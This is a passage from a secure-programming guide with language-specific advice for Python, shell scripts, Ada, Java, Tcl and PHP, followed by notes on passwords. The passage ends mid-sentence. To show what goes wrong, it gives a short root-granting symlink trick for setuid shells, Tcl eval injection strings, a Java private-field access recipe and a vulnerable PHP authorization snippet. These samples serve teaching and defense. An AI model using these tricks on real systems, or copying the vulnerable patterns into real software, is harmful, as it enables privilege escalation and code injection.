Python programs with privileges that can be invoked by unprivileged users
(e.g., setuid/setgid programs) must not import the ``user'' module. The user
module causes the pythonrc.py file to be read and executed. Since this file
would be under the control of an untrusted user, importing the user module
allows an attacker to force the trusted program to run arbitrary code.

Python does very little compile-time checking -- it has essentially no
compile-time type information, and it doesn't even check that the number of
parameters passed are legal for a given function or method. This is
unfortunate, resulting in a lot of latent bugs (both John Viega and I have
experienced this problem). Hopefully someday Python will implement optional
static typing and type-checking, an idea that's been discussed for some time.
A partial solution for now is PyChecker, a lint-like program that checks for
common bugs in Python source code. You can get PyChecker from [http://
pychecker.sourceforge.net] http://pychecker.sourceforge.net

Python includes support for ``Restricted Execution'' through its RExec class.
This is primarily intended for executing applets and mobile code, but it can
also be used to limit privilege in a program even when the code has not been
provided externally. By default, a restricted execution environment permits
reading (but not writing) of files, and does not include operations for
network access or GUI interaction. These defaults can be changed, but beware
of creating loopholes in the restricted environment. In particular, allowing
a user to unrestrictedly add attributes to a class permits all sorts of ways
to subvert the environment because Python's implementation calls many
``hidden'' methods. Note that, by default, most Python objects are passed by
reference; if you insert a reference to a mutable value into a restricted
program's environment, the restricted program can change the object in a way
that's visible outside the restricted environment! Thus, if you want to give
access to a mutable value, in many cases you should copy the mutable value or
use the Bastion module (which supports restricted access to another object).
For more information, see Kuchling [2000]. I'm uncertain of the amount of
auditing that the restricted execution capability has undergone, so
programmer beware.
-----------------------------------------------------------------------------

10.4. Shell Scripting Languages (sh and csh Derivatives)

I strongly recommend against using standard command shell scripting languages
(such as csh, sh, and bash) for setuid/setgid secure code. Some systems (such
as Linux) completely disable setuid/setgid shell scripts, so creating setuid/
setgid shell scripts creates an unnecessary portability problem. On some old
systems they are fundamentally insecure due to a race condition (as discussed
in Section 3.1.3). Even for other systems, they're not really a good idea.

In fact, there are a vast number of circumstances where shell scripting
languages shouldn't be used at all for secure programs. Standard command
shells are notorious for being affected by nonobvious inputs - generally
because command shells were designed to try to do things ``automatically''
for an interactive user, not to defend against a determined attacker. Shell
programs are fine for programs that don't need to be secure (e.g., they run
at the same privilege as the unprivileged user and don't accept ``untrusted''
data). They can also be useful when they're running with privilege, as long
as all the input (e.g., files, directories, command line, environment, etc.)
are all from trusted users - which is why they're often used quite
successfully in startup/shutdown scripts.

Writing secure shell programs in the presence of malicious input is harder
than in many other languages because of all the things that shells are
affected by. For example, ``hidden'' environment variables (e.g., the ENV,
BASH_ENV, and IFS values) can affect how they operate or even execute
arbitrary user-defined code before the script can even execute. Even things
like filenames of the executable or directory contents can affect execution.
If an attacker can create filenames containing some control characters (e.g.,
newline), or whitespace, or shell metacharacters, or begin with a dash (the
option flag syntax), there are often ways to exploit them. For example, on
many Bourne shell implementations, doing the following will grant root access
(thanks to NCSA for describing this exploit):
 % ln -s /usr/bin/setuid-shell /tmp/-x
 % cd /tmp
 % -x
Some systems may have closed this hole, but the point still stands: most
command shells aren't intended for writing secure setuid/setgid programs. For
programming purposes, avoid creating setuid shell scripts, even on those
systems that permit them. Instead, write a small program in another language
to clean up the environment, then have it call other executables (some of
which might be shell scripts).

If you still insist on using shell scripting languages, at least put the
script in a directory where it cannot be moved or changed. Set PATH and IFS
to known values very early in your script; indeed, the environment should be
cleaned before the script is called. Also, very early on, ``cd'' to a safe
directory. Use data only from directories that is controlled by trusted
users, e.g., /etc, so that attackers can't insert maliciously-named files
into those directories. Be sure to quote every filename passed on a command
line, e.g., use "$1" not $1, because filenames with whitespace will be split.
Call commands using "--" to disable additional options where you can, because
attackers may create or pass filenames beginning with dash in the hope of
tricking the program into processing it as an option. Be especially careful
of filenames embedding other characters (e.g., newlines and other control
characters). Examine input filenames especially carefully and be very
restrictive on what filenames are permitted.

If you don't mind limiting your program to only work with GNU tools (or if
you detect and optionally use the GNU tools instead when they are available),
you might want to use NIL characters as the filename terminator instead of
newlines. By using NIL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with embedded newlines) is much
simpler. Several GNU tools that output or input filenames can use this format
instead of the more common ``one filename per line'' format. Unfortunately,
the name of this option isn't consistent between tools; for many tools the
name of this option is ``--null'' or ``-0''. GNU programs xargs and cpio
allow using either --null or -0, tar uses --null, find uses -print0, grep
uses either --null or -Z, and sort uses either -z or --zero-terminated. Those
who find this inconsistency particularly disturbing are invited to supply
patches to the GNU authors; I would suggest making sure every program
supported ``--null'' since that seems to be the most common option name. For
example, here's one way to move files to a target directory, even if there
may be a vast number of files and some may have awkward names with embedded
newlines (thanks to Jim Dennis for reminding me of this):
 find . -print0 | xargs --null mv --target-dir=$TARG

In a similar vein, I recommend not trusting ``restricted shells'' to
implement secure policies. Restricted shells are shells that intentionally
prevent users from performing a large set of activities - their goal is to
force users to only run a small set of programs. A restricted shell can be
useful as a defense-in-depth measure, but restricted shells are notoriously
hard to configure correctly and as configured are often subvertable. For
example, some restricted shells will start by running some file in an
unrestricted mode (e.g., ``.profile'') - if a user can change this file, they
can force execution of that code. A restricted shell should be set up to only
run a few programs, but if any of those programs have ``shell escapes'' to
let users run more programs, attackers can use those shell escapes to escape
the restricted shell. Even if the programs don't have shell escapes, it's
quite likely that the various programs can be used together (along with the
shell's capabilities) to escape the restrictions. Of course, if you don't set
the PATH of a restricted shell (and allow any program to run), then an
attacker can use the shell escapes of many programs (including text editors,
mailers, etc.). The problem is that the purpose of a shell is to run other
programs, but those other programs may allow unintended operations -- and the
shell doesn't interpose itself to prevent these operations.
-----------------------------------------------------------------------------

10.5. Ada

In Ada95, the Unbounded_String type is often more flexible than the String
type because it is automatically resized as necessary. However, don't store
especially sensitive secret values such as passwords or secret keys in an
Unbounded_String, since core dumps and page areas might still hold them
later. Instead, use the String type for this data, lock it into memory while
it's used, and overwrite the data as soon as possible with some constant
value such as (others => ' '). Use the Ada pragma Inspection_Point on the
object holding the secret after erasing the memory. That way, you can be
certain that the object containing the secret will really be erased (and that
the the overwriting won't be optimized away).

It's common for beginning Ada programmers to believe that the String type's
first index value is always 1, but this isn't true if the string is sliced.
Avoid this error.

It's worth noting that SPARK is a ``high-integrity subset of the Ada
programming language''; SPARK users use a tool called the ``SPARK Examiner''
to check conformance to SPARK rules, including flow analysis, and there are
various supports for full formal proof of the code if desired. See the SPARK
website for more information. To my knowledge, there are no OSS/FS SPARK
tools. If you're storing passwords and private keys you should still lock
them into memory if appropriate and overwrite them as soon as possible. Note
that SPARK is often used in environments where paging does not occur.
-----------------------------------------------------------------------------

10.6. Java

If you're developing secure programs using Java, frankly your first step
(after learning Java) is to read the two primary texts for Java security,
namely Gong [1999] and McGraw [1999] (for the latter, look particularly at
section 7.1). You should also look at Sun's posted security code guidelines
at [http://java.sun.com/security/seccodeguide.html] http://java.sun.com/
security/seccodeguide.html, and there's a nice [http://www-106.ibm.com/
developerworks/java/library/j-staticsec.html?loc=dwmain] article by Sahu et
al [2002] A set of slides describing Java's security model are freely
available at [http://www.dwheeler.com/javasec] http://www.dwheeler.com/
javasec. You can also see McGraw [1998].

Obviously, a great deal depends on the kind of application you're developing.
Java code intended for use on the client side has a completely different
environment (and trust model) than code on a server side. The general
principles apply, of course; for example, you must check and filter any input
from an untrusted source. However, in Java there are some ``hidden'' inputs
or potential inputs that you need to be wary of, as discussed below.
Johnathan Nightingale [2000] made an interesting statement summarizing many
of the issues in Java programming:


    ... the big thing with Java programming is minding your inheritances. If
    you inherit methods from parents, interfaces, or parents' interfaces, you
    risk opening doors to your code.

The following are a few key guidelines, based on Gong [1999], McGraw [1999],
Sun's guidance, and my own experience:

 1. Do not use public fields or variables; declare them as private and
    provide accessors to them so you can limit their accessibility.

 2. Make methods private unless there is a good reason to do otherwise (and
    if you do otherwise, document why). These non-private methods must
    protect themselves, because they may receive tainted data (unless you've
    somehow arranged to protect them).

 3. The JVM may not actually enforce the accessibility modifiers (e.g.,
    ``private'') at run-time in an application (as opposed to an applet). My
    thanks to John Steven (Cigital Inc.), who pointed this out on the
    ``Secure Programming'' mailing list on November 7, 2000. The issue is
    that it all depends on what class loader the class requesting the access
    was loaded with. If the class was loaded with a trusted class loader
    (including the null/ primordial class loader), the access check returns
    "TRUE" (allowing access). For example, this works (at least with Sun's
    1.2.2 VM ; it might not work with other implementations):

     a. write a victim class (V) with a public field, compile it.

     b. write an 'attack' class (A) that accesses that field, compile it

     c. change V's public field to private, recompile

     d. run A - it'll access V's (now private) field.


    However, the situation is different with applets. If you convert A to an
    applet and run it as an applet (e.g., with appletviewer or browser), its
    class loader is no longer a trusted (or null) class loader. Thus, the
    code will throw java.lang.IllegalAccessError, with the message that
    you're trying to access a field V.secret from class A.

 4. Avoid using static field variables. Such variables are attached to the
    class (not class instances), and classes can be located by any other
    class. As a result, static field variables can be found by any other
    class, making them much more difficult to secure.

 5. Never return a mutable object to potentially malicious code (since the
    code may decide to change it). Note that arrays are mutable (even if the
    array contents aren't), so don't return a reference to an internal array
    with sensitive data.

 6. Never store user given mutable objects (including arrays of objects)
    directly. Otherwise, the user could hand the object to the secure code,
    let the secure code ``check'' the object, and change the data while the
    secure code was trying to use the data. Clone arrays before saving them
    internally, and be careful here (e.g., beware of user-written cloning
    routines).

 7. Don't depend on initialization. There are several ways to allocate
    uninitialized objects.

 8. Make everything final, unless there's a good reason not to. If a class or
    method is non-final, an attacker could try to extend it in a dangerous
    and unforeseen way. Note that this causes a loss of extensibility, in
    exchange for security.

 9. Don't depend on package scope for security. A few classes, such as
    java.lang, are closed by default, and some Java Virtual Machines (JVMs)
    let you close off other packages. Otherwise, Java classes are not closed.
    Thus, an attacker could introduce a new class inside your package, and
    use this new class to access the things you thought you were protecting.

10. Don't use inner classes. When inner classes are translated into byte
    codes, the inner class is translated into a class accesible to any class
    in the package. Even worse, the enclosing class's private fields silently
    become non-private to permit access by the inner class!

11. Minimize privileges. Where possible, don't require any special
    permissions at all. McGraw goes further and recommends not signing any
    code; I say go ahead and sign the code (so users can decide to ``run only
    signed code by this list of senders''), but try to write the program so
    that it needs nothing more than the sandbox set of privileges. If you
    must have more privileges, audit that code especially hard.

12. If you must sign your code, put it all in one archive file. Here it's
    best to quote McGraw [1999]:

        The goal of this rule is to prevent an attacker from carrying out a
        mix-and-match attack in which the attacker constructs a new applet or
        library that links some of your signed classes together with
        malicious classes, or links together signed classes that you never
        meant to be used together. By signing a group of classes together,
        you make this attack more difficult. Existing code-signing systems do
        an inadequate job of preventing mix-and-match attacks, so this rule
        cannot prevent such attacks completely. But using a single archive
        can't hurt.


13. Make your classes uncloneable. Java's object-cloning mechanism allows an
    attacker to instantiate a class without running any of its constructors.
    To make your class uncloneable, just define the following method in each
    of your classes:
    public final Object clone() throws java.lang.CloneNotSupportedException {
       throw new java.lang.CloneNotSupportedException();
       }

    If you really need to make your class cloneable, then there are some
    protective measures you can take to prevent attackers from redefining
    your clone method. If you're defining your own clone method, just make it
    final. If you're not, you can at least prevent the clone method from
    being maliciously overridden by adding the following:
    public final void clone() throws java.lang.CloneNotSupportedException {
      super.clone();
      }

14. Make your classes unserializeable. Serialization allows attackers to view
    the internal state of your objects, even private portions. To prevent
    this, add this method to your classes:
    private final void writeObject(ObjectOutputStream out)
      throws java.io.IOException {
         throw new java.io.IOException("Object cannot be serialized");
      }

    Even in cases where serialization is okay, be sure to use the transient
    keyword for the fields that contain direct handles to system resources
    and that contain information relative to an address space. Otherwise,
    deserializing the class may permit improper access. You may also want to
    identify sensitive information as transient.

    If you define your own serializing method for a class, it should not pass
    an internal array to any DataInput/DataOuput method that takes an array.
    The rationale: All DataInput/DataOutput methods can be overridden. If a
    Serializable class passes a private array directly to a DataOutput(write
    (byte [] b)) method, then an attacker could subclass ObjectOutputStream
    and override the write(byte [] b) method to enable him to access and
    modify the private array. Note that the default serialization does not
    expose private byte array fields to DataInput/DataOutput byte array
    methods.

15. Make your classes undeserializeable. Even if your class is not
    serializeable, it may still be deserializeable. An attacker can create a
    sequence of bytes that happens to deserialize to an instance of your
    class with values of the attacker's choosing. In other words,
    deserialization is a kind of public constructor, allowing an attacker to
    choose the object's state - clearly a dangerous operation! To prevent
    this, add this method to your classes:
    private final void readObject(ObjectInputStream in)
      throws java.io.IOException {
        throw new java.io.IOException("Class cannot be deserialized");
      }

16. Don't compare classes by name. After all, attackers can define classes
    with identical names, and if you're not careful you can cause confusion
    by granting these classes undesirable privileges. Thus, here's an example
    of the wrong way to determine if an object has a given class:
      if (obj.getClass().getName().equals("Foo")) {

    If you need to determine if two objects have exactly the same class,
    instead use getClass() on both sides and compare using the == operator,
    Thus, you should use this form:
      if (a.getClass() == b.getClass()) {
    If you truly need to determine if an object has a given classname, you
    need to be pedantic and be sure to use the current namespace (of the
    current class's ClassLoader). Thus, you'll need to use this format:
      if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {

    This guideline is from McGraw and Felten, and it's a good guideline. I'll
    add that, where possible, it's often a good idea to avoid comparing class
    values anyway. It's often better to try to design class methods and
    interfaces so you don't need to do this at all. However, this isn't
    always practical, so it's important to know these tricks.

17. Don't store secrets (cryptographic keys, passwords, or algorithm) in the
    code or data. Hostile JVMs can quickly view this data. Code obfuscation
    doesn't really hide the code from serious attackers.


-----------------------------------------------------------------------------

10.7. Tcl

Tcl stands for ``tool command language'' and is pronounced ``tickle.'' Tcl is
divided into two parts: a language and a library. The language is a simple
language, originally intended for issuing commands to interactive programs
and including basic programming capabilities. The library can be embedded in
application programs. You can find more information about Tcl at sites such
as the [http://www.tcl.tk/] Tcl.tk and the [http://www.sco.com/Technology/tcl
/Tcl.html] Tcl WWW Info web page and the comp.lang.tcl FAQ launch page at
[http://www.tclfaq.wservice.com/tcl-faq] http://www.tclfaq.wservice.com/
tcl-faq. My thanks go to Wojciech Kocjan for providing some of this detailed
information on using Tcl in secure applications.

For some security applications, especially interesting components of Tcl are
Safe-Tcl (which creates a sandbox in Tcl) and Safe-TK (which implements a
sandboxed portable GUI for Safe Tcl), as well as the WebWiseTclTk Toolkit
which permits Tcl packages to be automatically located and loaded from
anywhere on the World Wide Web. You can find more about the latter from
[http://www.cbl.ncsu.edu/software/WebWiseTclTk] http://www.cbl.ncsu.edu/
software/WebWiseTclTk. It's not clear to me how much code review this has
received.

Tcl's original design goal to be a small, simple language resulted in a
language that was originally somewhat limiting and slow. For an example of
the limiting weaknesses in the original language, see [http://sdg.lcs.mit.edu
/~jchapin/6853-FT97/Papers/stallman-tcl.html] Richard Stallman's ``Why You
Should Not Use Tcl''. For example, Tcl was originally designed to really
support only one data type (string). Thankfully, these issues have been
addressed over time. In particular, version 8.0 added support for more data
types (integers are stored internally as integers, lists as lists and so on).
This improves its capabilities, and in particular improves its speed.

As with essentially all scripting languages, Tcl has an "eval" command that
parses and executes arbitrary Tcl commands. And like all such scripting
languages, this eval command needs to be used especially carefully, or an
attacker could insert characters in the input to cause malicious things to
occur. For example, an attackers may be able insert characters with special
meaning to Tcl such as embedded whitespace (including space and newline),
double-quote, curly braces, square brackets, dollar signs, backslash,
semicolon, or pound sign (or create input to cause these characters to be
created during processing). This also applies to any function that passes
data to eval as well (depending on how eval is called).

Here is a small example that may make this concept clearer; first, let's
define a small function and then interactively invoke it directly - note that
these uses are fine:
 proc something {a b c d e} {
       puts "A='$a'"
       puts "B='$b'"
       puts "C='$c'"
       puts "D='$d'"
       puts "E='$e'"
 }

 % # This works normally:
 % something "test 1" "test2" "t3" "t4" "t5"
 A='test 1'
 B='test2'
 C='t3'
 D='t4'
 E='t5'

 % # Imagine that str1 is set by an attacker:
 % set str1 {test 1 [puts HELLOWORLD]}

 % # This works as well
 % something $str1 t2 t3 t4 t5
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'
However, continuing the example, let's see how "eval" can be incorrectly and
correctly called. If you call eval in an incorrect (dangerous) way, it allows
attackers to misuse it. However, by using commands like list or lrange to
correctly group the input, you can avoid this problem:
 % # This is the WRONG way - str1 is interpreted.
 % eval something $str1 t2 t3
 HELLOWORLD
 A='test'
 B='1'
 C=''
 D='t2'
 E='t3'

 % # Here's one solution, using "list".
 % eval something [list $str1 t2 t3 t4 t5]
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'

 % # Here's another solution, using lrange:
 % eval something [lrange $str1 0 end] t2
 A='test'
 B='1'
 C='[puts'
 D='HELLOWORLD]'
 E='t2'
Using lrange is useful when concatenating arguments to a called function,
e.g., with more complex libraries using callbacks. In Tcl, eval is often used
to create a one-argument version of a function that takes a variable number
of arguments, and you need to be careful when using it this way. Here's
another example (presuming that you've defined a "printf" function):
 proc vprintf {str arglist} {
      eval printf [list $str] [lrange $arglist 0 end]
 }

 % printf "1+1=%d  2+2=%d" 2 4
 % vprintf "1+1=%d  2+2=%d" {2 4}

Fundamentally, when passing a command that will be eventually evaluated, you
must pass Tcl commands as a properly built list, and not as a (possibly
concatentated) string. For example, the "after" command runs a Tcl command
after a given number of milliseconds; if the data in $param1 can be
controlled by an attacker, this Tcl code is dangerously wrong:
  # DON'T DO THIS if param1 can be controlled by an attacker
  after 1000 "someCommand someparam $param1"
This is wrong, because if an attacker can control the value of $param1, the
attacker can control the program. For example, if the attacker can cause
$param1 to have '[exit]', then the program will exit. Also, if $param1 would
be '; exit', it would also exit.

Thus, the proper alternative would be:
 after 1000 [list someCommand someparam $param1]
Even better would be something like the following:
 set cmd [list someCommand someparam]
 after 1000 [concat $cmd $param1]

Here's another example showing what you shouldn't do, pretending that $params
is data controlled by possibly malicious user:
 set params "%-20s TESTSTRING"
 puts "'[eval format $params]'"
will result in:
 'TESTSTRING       '
But, when if the untrusted user sends data with an embedded newline, like
this:
 set params "%-20s TESTSTRING\nputs HELLOWORLD"
 puts "'[eval format $params]'"
The result will be this (notice that the attacker's code was executed!):
 HELLOWORLD
 'TESTINGSTRING       '
Wojciech Kocjan suggests that the simplest solution in this case is to
convert this to a list using lrange, doing this:
 set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
 puts "'[eval format [lrange $params 0 end]]'"
The result would be:
 'TESTINGSTRING       '
Note that this solution presumes that the potentially malicious text is
concatenated to the end of the text; as with all languages, make sure the
attacker cannot control the format text.

As a matter of style always use curly braces when using if, while, for, expr,
and any other command which parses an argument using expr/eval/subst. Doing
this will avoid a common error when using Tcl called unintended double
substitution (aka double substitution). This is best explained by example;
the following code is incorrect:
 while ![eof $file] {
     set line [gets $file]
 }
The code is incorrect because the "![eof $file]" text will be evaluated by
the Tcl parser when the while command is executed the first time, and not
re-evaluated in every iteration as it should be. Instead, do this:
 while {![eof $file]} {
      set line [gets $file]
 }
Note that both the condition, and the action to be performed, are surrounded
by curly braces. Although there are cases where the braces are redundant,
they never hurt, and when you fail to include the curly braces where they're
needed (say, when making a minor change) subtle and hard-to-find errors often
result.

More information on good Tcl style can be found in documents such as [http://
www.tcl.tk/doc/styleGuide.pdf] Ray Johnson's Tcl Style Guide.

In the past, I have stated that I don't recommend Tcl for writing programs
which must mediate a security boundary. Tcl seems to have improved since that
time, so while I cannot guarantee Tcl will work for your needs, I can't
guarantee that any other language will work for you either. Again, my thanks
to Wojciech Kocjan who provided some of these suggestions on how to write Tcl
code for secure applications.
-----------------------------------------------------------------------------

10.8. PHP

SecureReality has put out a very interesting paper titled ``A Study In
Scarlet - Exploiting Common Vulnerabilities in PHP'' [Clowes 2001], which
discusses some of the problems in writing secure programs in PHP,
particularly in versions before PHP 4.1.0. Clowes concludes that ``it is very
hard to write a secure PHP application (in the default configuration of PHP),
even if you try''.

Granted, there are security issues in any language, but one particular issue
stands out in older versions of PHP that arguably makes older PHP versions
less secure than most languages: the way it loads data into its namespace. By
default, in PHP (versions 4.1.0 and lower) all environment variables and
values sent to PHP over the web are automatically loaded into the same
namespace (global variables) that normal variables are loaded into - so
attackers can set arbitrary variables to arbitrary values, which keep their
values unless explicitly reset by a PHP program. In addition, PHP
automatically creates variables with a default value when they're first
requested, so it's common for PHP programs to not initialize variables. If
you forget to set a variable, PHP can report it, but by default PHP won't -
and note that this simply an error report, it won't stop an attacker who
finds an unusual way to cause it. Thus, by default PHP allows an attacker to
completely control the values of all variables in a program unless the
program takes special care to override the attacker. Once the program takes
over, it can reset these variables, but failing to reset any variable (even
one not obvious) might open a vulnerability in the PHP program.

For example, the following PHP program (an example from Clowes) intends to
only let those who know the password to get some important information, but
an attacker can set ``auth'' in their web browser and subvert the
authorization check:
 <?php
  if ($pass == "hello")
   $auth = 1;
  ...
  if ($auth == 1)
   echo "some important information";
 ?>

I and many others have complained about this particularly dangerous problem;
it's particularly a problem because PHP is widely used. A language that's
supposed to be easy to use better make it easy to write secure programs in,
after all. It's possible to disable this misfeature in PHP by turning the
setting ``register_globals'' to ``off'', but by default PHP versions up
through 4.1.0 default set this to ``on'' and PHP before 4.1.0 is harder to
use with register_globals off. The PHP developers warned in their PHP 4.1.0
announcenment that ``as of the next semi-major version of PHP, new
installations of PHP will default to having register_globals set to off.''
This has now happened; as of PHP version 4.2.0, External variables (from the
environment, the HTTP request, cookies or the web server) are no longer
registered in the global scope by default. The preferred method of accessing
these external variables is by using the new Superglobal arrays, introduced
in PHP 4.1.0.

PHP with ``register_globals'' set to ``on'' is a dangerous choice for
nontrivial programs - it's just too easy to write insecure programs. However,
once ``register_globals'' is set to ``off'', PHP is quite a reasonable
language for development.

The secure default should include setting ``register_globals'' to ``off'',
and also including several functions to make it much easier for users to
specify and limit the input they'll accept from external sources. Then web
servers (such as Apache) could separately configure this secure PHP
installation. Routines could be placed in the PHP library to make it easy for
users to list the input variables they want to accept; some functions could
check the patterns these variables must have and/or the type that the
variable must be coerced to. In my opinion, PHP is a bad choice for secure
web development if you set register_globals on.

As I suggested in earlier versions of this book, PHP has been trivially
modified to become a reasonable choice for secure web development. However,
note that PHP doesn't have a particularly good security vulnerability track
record (e.g., register_globals, a file upload problem, and a format string
problem in the error reporting library); I believe that security issues were
not considered sufficiently in early editions of PHP; I also think that the
PHP developers are now emphasizing security and that these security issues
are finally getting worked out. One evidence is the major change that the PHP
developers have made to get turn off register_globals; this had a significant
impact on PHP users, and their willingness to make this change is a good
sign. Unfortunately, it's not yet clear how secure PHP really is; PHP just
hasn't had much of a track record now that the developers of PHP are
examining it seriously for security issues. Hopefully this will become clear
quickly.

If you've decided to use PHP, here are some of my recommendations (many of
these recommendations are based on ways to counter the issues that Clowes
raises):

<A0><A0>*<2A>Set the PHP configuration option ``register_globals'' off, and use PHP
    4.2.0 or greater. PHP 4.1.0 adds several special arrays, particularly
    $_REQUEST, which makes it far simpler to develop software in PHP when
    ``register_globals'' is off. Setting register_globals off, which is the
    default in PHP 4.2.0, completely eliminates the most common PHP attacks.
    If you're assuming that register_globals is off, you should check for
    this first (and halt if it's not true) - that way, people who install
    your program will quickly know there's a problem. Note that many
    third-party PHP applications cannot work with this setting, so it can be
    difficult to keep it off for an entire website. It's possible to set
    register_globals off for only some programs. For example, for Apache, you
    could insert these lines into the file .htaccess in the PHP directory (or
    use Directory directives to control it further):
     php_flag register_globals Off
     php_flag track_vars On
    However, the .htaccess file itself is ignored unless the Apache web
    server is configured to permit overrides; often the Apache global
    configuration is set so that AllowOverride is set to None. So, for Apache
    users, if you can convince your web hosting service to set
    ``AllowOverride Options'' in their configuration file (often /etc/http/
    conf/http.conf) for your host, do that. Then write helper functions to
    simplify loading the data you need (and only that data).

<A0><A0>*<2A>If you must develop software where register_globals might be on while
    running (e.g., a widely-deployed PHP application), always set values not
    provided by the user. Don't depend on PHP default values, and don't trust
    any variable you haven't explicitly set. Note that you have to do this
    for every entry point (e.g., every PHP program or HTML file using PHP).
    The best approach is to begin each PHP program by setting all variables
    you'll be using, even if you're simply resetting them to the usual
    default values (like "" or 0). This includes global variables referenced
    in included files, even all libraries, transitively. Unfortunately, this
    makes this recommendation hard to do, because few developers truly know
    and understand all global variables that may be used by all functions
    they call. One lesser alternative is to search through HTTP_GET_VARS,
    HTTP_POST_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user
    provided the data - but programmers often forget to check all sources,
    and what happens if PHP adds a new data source (e.g., HTTP_POST_FILES
    wasn't in old versions of PHP). Of course, this simply tells you how to
    make the best of a bad situation; in case you haven't noticed yet, turn
    off register_globals!

<A0><A0>*<2A>Set the error reporting level to E_ALL, and resolve all errors reported
    by it during testing. Among other things, this will complain about
    un-initialized variables, which are a key issues in PHP. This is a good
    idea anyway whenever you start using PHP, because this helps debug
    programs, too. There are many ways to set the error reporting level,
    including in the ``php.ini'' file (global), the ``.htttpd.conf'' file
    (single-host), the ``.htaccess'' file (multi-host), or at the top of the
    script through the error_reporting function. I recommend setting the
    error reporting level in both the php.ini file and also at the top of the
    script; that way, you're protected if (1) you forget to insert the
    command at the top of the script, or (2) move the program to another
    machine and forget to change the php.ini file. Thus, every PHP program
    should begin like this:
      <?php error_reporting(E_ALL);?>
    It could be argued that this error reporting should be turned on during
    development, but turned off when actually run on a real site (since such
    error message could give useful information to an attacker). The problem
    is that if they're disabled during ``actual use'' it's all too easy to
    leave them disabled during development. So for the moment, I suggest the
    simple approach of simply including it in every entrance. A much better
    approach is to record all errors, but direct the error reports so they're
    only included in a log file (instead of having them reported to the
    attacker).

<A0><A0>*<2A>Filter any user information used to create filenames carefully, in
    particular to prevent remote file access. PHP by default comes with
    ``remote files'' functionality -- that means that file-opening commands
    like fopen(), that in other languages can only open local files, can
    actually be used to invoke web or ftp requests from another site.

<A0><A0>*<2A>Do not use old-style PHP file uploads; use the HTTP_POST_FILES array and
    related functions. PHP supports file uploads by uploading the file to
    some temporary directory with a special filename. PHP originally set a
    collection of variables to indicate where that filename was, but since an
    attacker can control variable names and their values, attackers could use
    that ability to cause great mischief. Instead, always use HTTP_POST_FILES
    and related functions to access uploaded files. Note that even in this
    case, PHP's approach permits attackers to temporarily upload files to you
    with arbitrary content, which is risky by itself.

<A0><A0>*<2A>Only place protected entry points in the document tree; place all other
    code (which should be most of it) outside the document tree. PHP has a
    history of unfortunate advice on this topic. Originally, PHP users were
    supposed to use the ``.inc'' (include) extension for ``included'' files,
    but these included files often had passwords and other information, and
    Apache would just give requesters the contents of the ``.inc'' files when
    asked to do so when they were in the document tree. Then developers gave
    all files a ``.php'' extension - which meant that the contents weren't
    seen, but now files never meant to be entry points became entry points
    and were sometimes exploitable. As mentioned earlier, the usual security
    advice is the best: place only the proected entry points (files) in the
    document tree, and place other code (e.g., libraries) outside the
    document tree. There shouldn't be any ``.inc'' files in the document tree
    at all.

<A0><A0>*<2A>Avoid the session mechanism. The ``session'' mechanism is handy for
    storing persistent data, but its current implementation has many
    problems. First, by default sessions store information in temporary files
    - so if you're on a multi-hosted system, you open yourself up to many
    attacks and revelations. Even those who aren't currently multi-hosted may
    find themselves multi-hosted later! You can "tie" this information into a
    database instead of the filesystem, but if others on a multi-hosted
    database can access that database with the same permissions, the problem
    is the same. There are also ambiguities if you're not careful (``is this
    the session value or an attacker's value''?) and this is another case
    where an attacker can force a file or key to reside on the server with
    content of their choosing - a dangerous situation - and the attacker can
    even control to some extent the name of the file or key where this data
    will be placed.

<A0><A0>*<2A>For all inputs, check that they match a pattern for acceptability (as
    with any language), and then use type casting to coerce non-string data
    into the type it should have. Develop ``helper'' functions to easily
    check and import a selected list of (expected) inputs. PHP is loosely
    typed, and this can cause trouble. For example, if an input datum has the
    value "000", it won't be equal to "0" nor is it empty(). This is
    particularly important for associative arrays, because their indexes are
    strings; this means that $data["000"] is different than $data["0"]. For
    example, to make sure $bar has type double (after making sure it only has
    the format legal for a double):
      $bar = (double) $bar;

<A0><A0>*<2A>Be especially careful of risky functions. This includes those that
    perform PHP code execution (e.g., require(), include(), eval(),
    preg_replace()), command execution (e.g., exec(), passthru(), the
    backtick operator, system(), and popen()), and open files (e.g., fopen(),
    readfile(), and file()). This is not an exhaustive list!

<A0><A0>*<2A>Use magic_quotes_gpc() where appropriate - this eliminates many kinds of
    attacks.

<A0><A0>*<2A>Avoid file uploads, and consider modifying the php.ini file to disable
    them (file_uploads = Off). File uploads have had security holes in the
    past, so on older PHP's this is a necessity, and until more experience
    shows that they're safe this isn't a bad thing to remove. Remember, in
    general, to secure a system you should disable or remove anything you
    don't need.


-----------------------------------------------------------------------------
Chapter 11. Special Topics

<A0>                                      Understanding is a fountain of life to
                                       those who have it, but folly brings
                                       punishment to fools.
<A0>                                                        Proverbs 16:22 (NIV)
-----------------------------------------------------------------------------

11.1. Passwords

Where possible, don't write code to handle passwords. In particular, if the
application is local, try to depend on the normal login authentication by a
user. If the application is a CGI script, try to depend on the web server to
provide the protection as much as possible - but see below about handling
authentication in a web server. If the application is over a network, avoid
sending the password as cleartext (where possible) since it can be easily
captured by network sniffers and reused later. ``Encrypting'' a password
using some key fixed in the algorithm or using some sort of shrouding
algorithm is essentially the same as sending the password as cleartext.

For networks, consider at least using digest passwords. Digest passwords are
passwords developed from hashes; typically the server will send the client
some data (e.g., date, time, name of server), the client combines this data
with the user password, the client hashes this value (termed the ``digest
pasword'') and replies just the hashed result to the server; the server
verifies this hash value. This works, because the password is never actually
sent in any form; the password is just used to derive the hash value. Digest
passwords aren't considered ``encryption'' in the usual sense and are usually
accepted even in countries with laws constraining encryption for
confidentiality. Digest passwords are vulnerable to active attack threats but
protect against passive network sniffers. One weakness is that, for digest
passwords to work, the server must have all the unhashed passwords, making
the server a very tempting target for attack.

If your application permits users to set their passwords, check the passwords
and permit only ``good'' passwords (e.g., not in a dictionary, having certain
minimal length, etc.). You may want to look at information such as [http://
consult.cern.ch/writeup/security/security_3.html] http://consult.cern.ch/
writeup/security/security_3.html on how to choose a good password. You should
use PAM if you can, because it supports pluggable password checkers.
-----------------------------------------------------------------------------

11.2. Authenticating on the Web

On the web, a web server is usually authenticated to users by using SSL or
TLS and a server certificate - but it's not as easy to authenticate who the
users are. SSL and TLS do support client-side certificates, but there are
